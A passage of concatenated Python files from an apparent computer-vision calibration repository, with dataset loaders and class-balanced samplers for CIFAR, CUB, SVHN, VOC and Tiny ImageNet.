train_dataset = IMBALANCECIFAR100(root=root, imb_type=imb_type, imb_factor=imb_factor, rand_number=0, train=True, download=True, transform=train_transform)
eval_dataset = torchvision.datasets.CIFAR100(root=root, train=False, download=False, transform=eval_transform)
self.cls_num_list = train_dataset.get_cls_num_list()
self.dist_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed else None
self.train_instance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=True,
num_workers=num_works, pin_memory=True, sampler=self.dist_sampler)
balance_sampler = ClassAwareSampler(train_dataset)
self.train_balance = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True, sampler=balance_sampler)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
class CIFAR100_LT_test(object):
def __init__(self, distributed, root='./data/cifar100', imb_type='exp',
imb_factor=0.01, batch_size=128, num_works=40):
eval_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
eval_dataset = torchvision.datasets.CIFAR100(root=root, train=False, download=False, transform=eval_transform)
self.eval = torch.utils.data.DataLoader(
eval_dataset,
batch_size=batch_size, shuffle=False,
num_workers=num_works, pin_memory=True)
def get_train_valid_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR100_LT(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
train_loader = dataset.train_balance
val_loader = dataset.eval
return (train_loader, val_loader)
def get_test_loader(distributed=False, root='/dataset/cifar10', imb_factor=0.01, batch_size=128, num_works=40):
dataset = CIFAR100_LT_test(distributed, root=root, imb_factor=imb_factor,
batch_size=batch_size, num_works=num_works)
test_loader = dataset.eval
return test_loader | 5,543 | Python | .py | 105 | 41.361905 | 163 | 0.632529 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,874 | cub.py | cvlab-yonsei_RankMixup/calibrate/data/cub.py | import os.path as osp
from albumentations.augmentations.geometric.resize import SmallestMaxSize
import cv2
from torch.utils.data.dataset import Dataset
from torch.utils.data import DataLoader
from typing import Callable, Optional
import albumentations as A
from albumentations.pytorch import ToTensorV2
class CUBDataset(Dataset):
def __init__(self, data_root,
is_train: bool = True,
transformer: Optional[Callable] = None) -> None:
super().__init__()
self.data_root = data_root
self.img_dir = osp.join(self.data_root, "images")
self.is_train = is_train
self.transformer = transformer
self.load_list()
def load_list(self):
img_txt_file = osp.join(self.data_root, "images.txt")
with open(img_txt_file, "r") as f:
all_img_names = [
line.strip().split(" ")[-1]
for line in f
]
label_txt_file = osp.join(self.data_root, "image_class_labels.txt")
with open(label_txt_file, "r") as f:
all_labels = [
int(line.strip().split(" ")[-1]) - 1
for line in f
]
train_test_file = osp.join(self.data_root, "train_test_split.txt")
with open(train_test_file, "r") as f:
train_test = [
int(line.strip().split(" ")[-1])
for line in f
]
if self.is_train:
self.img_names = [
x for i, x in zip(train_test, all_img_names) if i
]
self.labels = [
x for i, x in zip(train_test, all_labels) if i
]
else:
self.img_names = [
x for i, x in zip(train_test, all_img_names) if not i
]
self.labels = [
x for i, x in zip(train_test, all_labels) if not i
]
def __getitem__(self, i: int):
label = self.labels[i]
img_path = osp.join(self.img_dir, self.img_names[i])
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if self.transformer is not None:
result = self.transformer(image=img)
img = result["image"]
return img, label
def __len__(self) -> int:
return len(self.img_names)
def __repr__(self) -> str:
return (
"CUBDataset(data_root={}, is_train={}\tSamples : {})".format(
self.data_root, self.is_train, self.__len__()
)
)
def data_transformer(is_train: bool = True, scale_size=256, crop_size=224):
if is_train:
transformer = A.Compose([
A.Resize(scale_size, scale_size),
A.RandomCrop(crop_size, crop_size),
A.HorizontalFlip(),
A.Normalize(),
ToTensorV2()
])
else:
transformer = A.Compose([
A.Resize(scale_size, scale_size),
A.CenterCrop(crop_size, crop_size),
A.Normalize(),
ToTensorV2()
])
return transformer
def get_train_val_loader(
data_root, batch_size=32, scale_size=256, crop_size=224,
num_workers=8, pin_memory=True
):
train_dataset = CUBDataset(
data_root=data_root,
is_train=True,
transformer=data_transformer(
is_train=True, scale_size=scale_size, crop_size=crop_size
)
)
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True
)
val_dataset = CUBDataset(
data_root=data_root,
is_train=False,
transformer=data_transformer(
is_train=False, scale_size=scale_size, crop_size=crop_size
)
)
val_loader = DataLoader(
val_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory
)
return train_loader, val_loader
def get_test_loader(
data_root, batch_size=32, scale_size=256, crop_size=224,
num_workers=8, pin_memory=True
):
test_dataset = CUBDataset(
data_root=data_root,
is_train=False,
transformer=data_transformer(
is_train=False, scale_size=scale_size, crop_size=crop_size
)
)
test_loader = DataLoader(
test_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory
)
return test_loader
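# Hedged usage sketch (added for illustration, not part of the original module):
# the CUB-200-2011 path below is an assumption; the folder must contain images/,
# images.txt, image_class_labels.txt and train_test_split.txt as read by
# CUBDataset above.
if __name__ == "__main__":
    train_loader, val_loader = get_train_val_loader(
        data_root="./data/CUB_200_2011", batch_size=8, num_workers=2
    )
    imgs, labels = next(iter(train_loader))
    print(imgs.shape, labels[:4])  # e.g. torch.Size([8, 3, 224, 224])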
| 4,531 | Python | .py | 136 | 24.073529 | 75 | 0.565188 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,875 | svhn.py | cvlab-yonsei_RankMixup/calibrate/data/svhn.py |
import os
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
def get_train_valid_loader(batch_size,
augment,
random_seed,
valid_size=0.1,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning train and valid
multi-process iterators over the SVHN dataset.
Params:
------
- batch_size: how many samples per batch to load.
    - augment: kept for interface compatibility; the augmentation transform
      is commented out below, so this flag currently has no effect.
- random_seed: fix seed for reproducibility.
- valid_size: percentage split of the training set used for
the validation set. Should be a float in the range [0, 1].
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
error_msg = "[!] valid_size should be in the range [0, 1]."
assert ((valid_size >= 0) and (valid_size <= 1)), error_msg
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
#if augment:
# train_transform = transforms.Compose([
# transforms.RandomCrop(32, padding=4),
# transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# normalize,
# ])
#else:
# train_transform = transforms.Compose([
# transforms.ToTensor(),
# normalize,
# ])
# load the dataset
# data_dir = './data'
train_dataset = datasets.SVHN(
root=data_dir, split='train',
download=True, transform=valid_transform,
)
valid_dataset = datasets.SVHN(
root=data_dir, split='train',
download=True, transform=valid_transform,
)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, sampler=train_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
valid_loader = torch.utils.data.DataLoader(
valid_dataset, batch_size=batch_size, sampler=valid_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
return (train_loader, valid_loader)
def get_test_loader(batch_size,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning a multi-process
test iterator over the SVHN dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- batch_size: how many samples per batch to load.
- shuffle: whether to shuffle the dataset after every epoch.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- data_loader: test set iterator.
"""
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transform
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# data_dir = './data'
dataset = datasets.SVHN(
root=data_dir, split='test',
download=True, transform=transform,
)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers, pin_memory=pin_memory,
)
return data_loader
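# Hedged usage sketch (added for illustration, not in the original file): a
# minimal call of the two helpers above; data_dir and batch_size are placeholder
# assumptions, and SVHN is downloaded into data_dir on first use.
if __name__ == "__main__":
    train_loader, valid_loader = get_train_valid_loader(
        batch_size=128, augment=False, random_seed=1, data_dir="./data"
    )
    test_loader = get_test_loader(batch_size=128, data_dir="./data")
    print(len(train_loader.sampler), len(valid_loader.sampler), len(test_loader.dataset))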
| 4,560 | Python | .py | 125 | 29.04 | 76 | 0.62885 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,876 | voc.py | cvlab-yonsei_RankMixup/calibrate/data/voc.py | import os.path as osp
import numpy as np
import cv2
from PIL import Image
from typing import Callable, Optional
from torch.utils.data import Dataset, DataLoader
import albumentations as A
from albumentations.pytorch import ToTensorV2
CLASSES = ('background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog',
'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa',
'train', 'tvmonitor')
PALETTE = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],
[128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0],
[192, 0, 0], [64, 128, 0], [192, 128, 0], [64, 0, 128],
[192, 0, 128], [64, 128, 128], [192, 128, 128], [0, 64, 0],
[128, 64, 0], [0, 192, 0], [128, 192, 0], [0, 64, 128]]
class VOCSegmentation(Dataset):
def __init__(
self,
data_root: str,
split: str = "train",
data_transform: Optional[Callable] = None,
return_id=False
):
assert split in {"train", "val", "trainval", "test"}
super().__init__()
self.data_root = data_root
self.split = split
self.data_transform = data_transform
self.return_id = return_id
self.classes = CLASSES
self.num_classes = 21
self.load_list()
def load_list(self):
self.img_dir = osp.join(self.data_root, "JPEGImages")
self.mask_dir = osp.join(self.data_root, "SegmentationClass")
self.split_dir = osp.join(self.data_root, "ImageSets/Segmentation")
split_file = osp.join(self.split_dir, "{}.txt".format(self.split))
with open(split_file, "r") as f:
file_names = [x.strip() for x in f.readlines()]
self.images = [osp.join(self.img_dir, x + ".jpg") for x in file_names]
self.masks = [osp.join(self.mask_dir, x + ".png") for x in file_names]
assert len(self.images) == len(self.masks)
def convert_to_segmentation_mask(self, mask, onehot=False):
# This function converts a mask from the Pascal VOC format to the format required by AutoAlbument.
#
# Pascal VOC uses an RGB image to encode the segmentation mask for that image. RGB values of a pixel
# encode the pixel's class.
#
# Each channel in this mask should encode values for a single class. Pixel in a mask channel should have
# a value of 1.0 if the pixel of the image belongs to this class and 0.0 otherwise.
height, width = mask.shape[:2]
segmentation_mask = np.zeros(
            (height, width, self.num_classes), dtype=np.int64
)
for label_index, label in enumerate(PALETTE):
            segmentation_mask[:, :, label_index] = np.all(mask == label, axis=-1).astype(np.int64)
return segmentation_mask
def __getitem__(self, index):
img = cv2.imread(self.images[index])
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
mask = np.array(Image.open(self.masks[index]))
if self.data_transform is not None:
result = self.data_transform(
image=img, mask=mask
)
img = result["image"]
mask = result["mask"].long()
if self.return_id:
return (
img, mask, self.images[index].split("/")[-1].split(".")[0]
)
else:
return img, mask
def __len__(self) -> int:
return len(self.images)
def __repr__(self) -> str:
return (
"VOCSegmentation (data_root={},split={})\tSamples : {}".format(
self.data_root, self.split, self.__len__()
)
)
def data_transformer(is_train: bool = True):
if is_train:
transformer = A.Compose([
A.LongestMaxSize(max_size=640),
A.PadIfNeeded(
min_height=512, min_width=512,
border_mode=cv2.BORDER_CONSTANT,
value=(0, 0, 0), mask_value=255
),
A.RandomCrop(height=512, width=512),
A.HorizontalFlip(),
A.RandomBrightnessContrast(brightness_limit=0.3, contrast_limit=0.3, p=0.5),
A.HueSaturationValue(),
A.Normalize(),
ToTensorV2()
])
else:
transformer = A.Compose([
A.LongestMaxSize(max_size=480),
A.PadIfNeeded(
min_height=480, min_width=480,
border_mode=cv2.BORDER_CONSTANT,
value=(0, 0, 0), mask_value=255
),
A.Normalize(),
ToTensorV2()
])
return transformer
def get_train_val_loader(
data_root, batch_size=32, num_workers=8, pin_memory=True
):
train_dataset = VOCSegmentation(
data_root,
split="train",
data_transform=data_transformer(is_train=True)
)
train_loader = DataLoader(
train_dataset,
batch_size=batch_size,
shuffle=True,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True
)
val_dataset = VOCSegmentation(
data_root,
split="val",
data_transform=data_transformer(is_train=False)
)
val_loader = DataLoader(
val_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
return train_loader, val_loader
def get_test_loader(
data_root, batch_size=32,
num_workers=8, pin_memory=True
):
test_dataset = VOCSegmentation(
data_root,
split="val",
data_transform=data_transformer(is_train=False)
)
test_loader = DataLoader(
test_dataset,
batch_size=batch_size,
num_workers=num_workers,
pin_memory=pin_memory,
)
return test_loader
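# Hedged usage sketch (added for illustration, not in the original file): the
# VOC2012 root below is an assumption; it must contain JPEGImages/,
# SegmentationClass/ and ImageSets/Segmentation/ as read by VOCSegmentation.
if __name__ == "__main__":
    train_loader, val_loader = get_train_val_loader(
        data_root="./data/VOCdevkit/VOC2012", batch_size=4, num_workers=2
    )
    img, mask = next(iter(train_loader))
    print(img.shape, mask.shape)  # e.g. (4, 3, 512, 512) and (4, 512, 512)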
| 5,829 | Python | .py | 155 | 28.658065 | 112 | 0.576821 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,877 | cifar100.py | cvlab-yonsei_RankMixup/calibrate/data/cifar100.py | """
Create train, valid, test iterators for CIFAR-100.
Train set size: 45000
Val set size: 5000
Test set size: 10000
"""
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data.sampler import SubsetRandomSampler
def get_train_valid_loader(batch_size,
augment,
random_seed,
valid_size=0.1,
shuffle=True,
num_workers=4,
pin_memory=False,
get_val_temp=0,
data_dir="./data"):
"""
Utility function for loading and returning train and valid
multi-process iterators over the CIFAR-100 dataset.
Params:
------
- batch_size: how many samples per batch to load.
- augment: whether to apply the data augmentation scheme
mentioned in the paper. Only applied on the train split.
- random_seed: fix seed for reproducibility.
- valid_size: percentage split of the training set used for
the validation set. Should be a float in the range [0, 1].
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
- get_val_temp: set to 1 if temperature is to be set on a separate
val set other than normal val set.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
error_msg = "[!] valid_size should be in the range [0, 1]."
assert ((valid_size >= 0) and (valid_size <= 1)), error_msg
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
if augment:
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
else:
train_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# load the dataset
# data_dir = './data'
train_dataset = datasets.CIFAR100(
root=data_dir, train=True,
download=True, transform=train_transform,
)
valid_dataset = datasets.CIFAR100(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
if get_val_temp > 0:
valid_temp_dataset = datasets.CIFAR100(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
split = int(np.floor(get_val_temp * split))
valid_idx, valid_temp_idx = valid_idx[split:], valid_idx[:split]
valid_temp_sampler = SubsetRandomSampler(valid_temp_idx)
valid_temp_loader = torch.utils.data.DataLoader(
valid_temp_dataset, batch_size=batch_size, sampler=valid_temp_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, sampler=train_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
valid_loader = torch.utils.data.DataLoader(
valid_dataset, batch_size=batch_size, sampler=valid_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
if get_val_temp > 0:
return (train_loader, valid_loader, valid_temp_loader)
else:
return (train_loader, valid_loader)
def get_test_loader(batch_size,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning a multi-process
test iterator over the CIFAR-100 dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- data_dir: path directory to the dataset.
- batch_size: how many samples per batch to load.
- shuffle: whether to shuffle the dataset after every epoch.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- data_loader: test set iterator.
"""
    # use the same statistics as the train/valid transforms above
    normalize = transforms.Normalize(
        mean=[0.4914, 0.4822, 0.4465],
        std=[0.2023, 0.1994, 0.2010],
    )
# define transform
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# data_dir = './data'
dataset = datasets.CIFAR100(
root=data_dir, train=False,
download=True, transform=transform,
)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers, pin_memory=pin_memory,
)
return data_loader
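# Hedged usage sketch (added for illustration, not in the original file): the
# call below reproduces the 45000/5000/10000 split documented at the top of this
# file; the data_dir and batch size are placeholder assumptions.
if __name__ == "__main__":
    train_loader, valid_loader = get_train_valid_loader(
        batch_size=128, augment=True, random_seed=1,
        valid_size=0.1, data_dir="./data"
    )
    test_loader = get_test_loader(batch_size=128, data_dir="./data")
    print(len(train_loader.sampler), len(valid_loader.sampler), len(test_loader.dataset))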
| 5,533 | Python | .py | 148 | 29.216216 | 82 | 0.628705 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,878 | cifar10.py | cvlab-yonsei_RankMixup/calibrate/data/cifar10.py | """
Create train, valid, test iterators for CIFAR-10.
Train set size: 45000
Val set size: 5000
Test set size: 10000
"""
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data.sampler import SubsetRandomSampler
from calibrate.utils.torch_helper import worker_init_fn
def get_train_valid_loader(batch_size,
augment,
random_seed,
valid_size=0.1,
shuffle=True,
num_workers=4,
pin_memory=False,
get_val_temp=0,
data_dir="./data"):
"""
Utility function for loading and returning train and valid
multi-process iterators over the CIFAR-10 dataset.
Params:
------
- batch_size: how many samples per batch to load.
- augment: whether to apply the data augmentation scheme
mentioned in the paper. Only applied on the train split.
- random_seed: fix seed for reproducibility.
- valid_size: percentage split of the training set used for
the validation set. Should be a float in the range [0, 1].
- shuffle: whether to shuffle the train/validation indices.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
- get_val_temp: set to 1 if temperature is to be set on a separate
val set other than normal val set.
Returns
-------
- train_loader: training set iterator.
- valid_loader: validation set iterator.
"""
error_msg = "[!] valid_size should be in the range [0, 1]."
assert ((valid_size >= 0) and (valid_size <= 1)), error_msg
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transforms
valid_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
if augment:
train_transform = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
else:
train_transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# load the dataset
# data_dir = './data'
train_dataset = datasets.CIFAR10(
root=data_dir, train=True,
download=True, transform=train_transform,
)
valid_dataset = datasets.CIFAR10(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
num_train = len(train_dataset)
indices = list(range(num_train))
split = int(np.floor(valid_size * num_train))
if shuffle:
np.random.seed(random_seed)
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
if get_val_temp > 0:
valid_temp_dataset = datasets.CIFAR10(
root=data_dir, train=True,
download=False, transform=valid_transform,
)
split = int(np.floor(get_val_temp * split))
valid_idx, valid_temp_idx = valid_idx[split:], valid_idx[:split]
valid_temp_sampler = SubsetRandomSampler(valid_temp_idx)
valid_temp_loader = torch.utils.data.DataLoader(
valid_temp_dataset, batch_size=batch_size, sampler=valid_temp_sampler,
num_workers=num_workers, pin_memory=pin_memory,
)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size,
sampler=train_sampler,
num_workers=num_workers,
pin_memory=pin_memory,
drop_last=True
# worker_init_fn=worker_init_fn,
)
valid_loader = torch.utils.data.DataLoader(
valid_dataset,
batch_size=batch_size,
sampler=valid_sampler,
num_workers=num_workers,
pin_memory=pin_memory,
# worker_init_fn=worker_init_fn,
)
if get_val_temp > 0:
return (train_loader, valid_loader, valid_temp_loader)
else:
return (train_loader, valid_loader)
def get_test_loader(batch_size,
shuffle=True,
num_workers=4,
pin_memory=False,
data_dir="./data"):
"""
Utility function for loading and returning a multi-process
test iterator over the CIFAR-10 dataset.
If using CUDA, num_workers should be set to 1 and pin_memory to True.
Params
------
- batch_size: how many samples per batch to load.
- shuffle: whether to shuffle the dataset after every epoch.
- num_workers: number of subprocesses to use when loading the dataset.
- pin_memory: whether to copy tensors into CUDA pinned memory. Set it to
True if using GPU.
Returns
-------
- data_loader: test set iterator.
"""
normalize = transforms.Normalize(
mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010],
)
# define transform
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
# data_dir = './data'
dataset = datasets.CIFAR10(
root=data_dir, train=False,
download=True, transform=transform,
)
data_loader = torch.utils.data.DataLoader(
dataset, batch_size=batch_size, shuffle=shuffle,
num_workers=num_workers, pin_memory=pin_memory,
)
return data_loader
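# Hedged sketch (added for illustration, not in the original file): when
# get_val_temp > 0 the loader above carves a third subset out of the validation
# indices, intended for tuning a temperature. The fractions, path and batch
# size below are placeholder assumptions.
def _demo_val_temp_split(data_dir="./data"):
    train_loader, valid_loader, valid_temp_loader = get_train_valid_loader(
        batch_size=128, augment=True, random_seed=1,
        valid_size=0.1, get_val_temp=0.5, data_dir=data_dir
    )
    # with 50000 training images this yields 45000 / 2500 / 2500 samples
    return (len(train_loader.sampler), len(valid_loader.sampler),
            len(valid_temp_loader.sampler))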
| 5,698 | Python | .py | 157 | 28.076433 | 82 | 0.624796 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,879 | sampler.py | cvlab-yonsei_RankMixup/calibrate/data/sampler.py | import numpy as np
import random
import torch
class BalancedDatasetSampler(torch.utils.data.sampler.Sampler):
def __init__(self, dataset, indices=None, num_samples=None):
# if indices is not provided,
# all elements in the dataset will be considered
self.indices = list(range(len(dataset))) \
if indices is None else indices
# if num_samples is not provided,
# draw `len(indices)` samples in each iteration
self.num_samples = len(self.indices) \
if num_samples is None else num_samples
# distribution of classes in the dataset
label_to_count = [0] * len(np.unique(dataset.targets))
for idx in self.indices:
label = self._get_label(dataset, idx)
label_to_count[label] += 1
per_cls_weights = 1 / np.array(label_to_count)
# weight for each sample
weights = [per_cls_weights[self._get_label(dataset, idx)]
for idx in self.indices]
self.weights = torch.DoubleTensor(weights)
def _get_label(self, dataset, idx):
return dataset.targets[idx]
def __iter__(self):
return iter(torch.multinomial(self.weights, self.num_samples, replacement=True).tolist())
def __len__(self):
return self.num_samples
class EffectNumSampler(torch.utils.data.sampler.Sampler):
def __init__(self, dataset, indices=None, num_samples=None):
# if indices is not provided,
# all elements in the dataset will be considered
self.indices = list(range(len(dataset))) \
if indices is None else indices
# if num_samples is not provided,
# draw `len(indices)` samples in each iteration
self.num_samples = len(self.indices) \
if num_samples is None else num_samples
# distribution of classes in the dataset
label_to_count = [0] * len(np.unique(dataset.targets))
for idx in self.indices:
label = self._get_label(dataset, idx)
label_to_count[label] += 1
beta = 0.9999
effective_num = 1.0 - np.power(beta, label_to_count)
per_cls_weights = (1.0 - beta) / np.array(effective_num)
# weight for each sample
weights = [per_cls_weights[self._get_label(dataset, idx)]
for idx in self.indices]
self.weights = torch.DoubleTensor(weights)
def _get_label(self, dataset, idx):
return dataset.targets[idx]
def __iter__(self):
return iter(torch.multinomial(self.weights, self.num_samples, replacement=True).tolist())
def __len__(self):
return self.num_samples
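# Hedged sketch (added for illustration, not part of the original module): both
# samplers above only require a dataset exposing an integer `targets` list. The
# toy dataset and its 90/10 class imbalance are invented for the example.
def _demo_balanced_sampler():
    class _ToyDataset(torch.utils.data.Dataset):
        def __init__(self):
            self.targets = [0] * 90 + [1] * 10  # heavily imbalanced labels
        def __getitem__(self, idx):
            return torch.zeros(3), self.targets[idx]
        def __len__(self):
            return len(self.targets)
    dataset = _ToyDataset()
    sampler = BalancedDatasetSampler(dataset)
    loader = torch.utils.data.DataLoader(dataset, batch_size=10, sampler=sampler)
    # each epoch now draws the two classes with roughly equal probability
    return next(iter(loader))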
class RandomCycleIter:
def __init__ (self, data, test_mode=False):
self.data_list = list(data)
self.length = len(self.data_list)
self.i = self.length - 1
self.test_mode = test_mode
def __iter__ (self):
return self
def __next__ (self):
self.i += 1
if self.i == self.length:
self.i = 0
if not self.test_mode:
random.shuffle(self.data_list)
return self.data_list[self.i]
def class_aware_sample_generator(cls_iter, data_iter_list, n, num_samples_cls=1):
i = 0
j = 0
while i < n:
# yield next(data_iter_list[next(cls_iter)])
if j >= num_samples_cls:
j = 0
if j == 0:
temp_tuple = next(zip(*[data_iter_list[next(cls_iter)]]*num_samples_cls))
yield temp_tuple[j]
else:
yield temp_tuple[j]
i += 1
j += 1
class ClassAwareSampler(torch.utils.data.sampler.Sampler):
def __init__(self, data_source, num_samples_cls=4,):
# pdb.set_trace()
num_classes = len(np.unique(data_source.targets))
self.class_iter = RandomCycleIter(range(num_classes))
cls_data_list = [list() for _ in range(num_classes)]
for i, label in enumerate(data_source.targets):
cls_data_list[label].append(i)
self.data_iter_list = [RandomCycleIter(x) for x in cls_data_list]
self.num_samples = max([len(x) for x in cls_data_list]) * len(cls_data_list)
self.num_samples_cls = num_samples_cls
def __iter__ (self):
return class_aware_sample_generator(self.class_iter, self.data_iter_list,
self.num_samples, self.num_samples_cls)
def __len__ (self):
return self.num_samples
def get_sampler():
return ClassAwareSampler | 4,803 | Python | .py | 104 | 34.326923 | 97 | 0.612962 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,880 | tiny_imagenet.py | cvlab-yonsei_RankMixup/calibrate/data/tiny_imagenet.py | """
Create train, val, test iterators for Tiny ImageNet.
Train set size: 100000
Val set size: 10000
Test set size: 10000
Number of classes: 200
Link: https://tiny-imagenet.herokuapp.com/
"""
import os
import torch
import numpy as np
from torchvision import datasets
from torchvision import transforms
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
import glob
from PIL import Image
EXTENSION = 'JPEG'
NUM_IMAGES_PER_CLASS = 500
CLASS_LIST_FILE = 'wnids.txt'
VAL_ANNOTATION_FILE = 'val_annotations.txt'
class TinyImageNet(Dataset):
"""Tiny ImageNet data set available from `http://cs231n.stanford.edu/tiny-imagenet-200.zip`.
Parameters
----------
root: string
Root directory including `train`, `test` and `val` subdirectories.
split: string
Indicating which split to return as a data set.
Valid option: [`train`, `test`, `val`]
transform: torchvision.transforms
A (series) of valid transformation(s).
in_memory: bool
Set to True if there is enough memory (about 5G) and want to minimize disk IO overhead.
"""
def __init__(self, root, split='train', transform=None, target_transform=None, in_memory=False):
self.root = os.path.expanduser(root)
self.split = split
self.transform = transform
self.target_transform = target_transform
self.in_memory = in_memory
self.split_dir = os.path.join(root, self.split)
self.image_paths = sorted(glob.iglob(os.path.join(self.split_dir, '**', '*.%s' % EXTENSION), recursive=True))
self.labels = {} # fname - label number mapping
self.images = [] # used for in-memory processing
# build class label - number mapping
with open(os.path.join(self.root, CLASS_LIST_FILE), 'r') as fp:
self.label_texts = sorted([text.strip() for text in fp.readlines()])
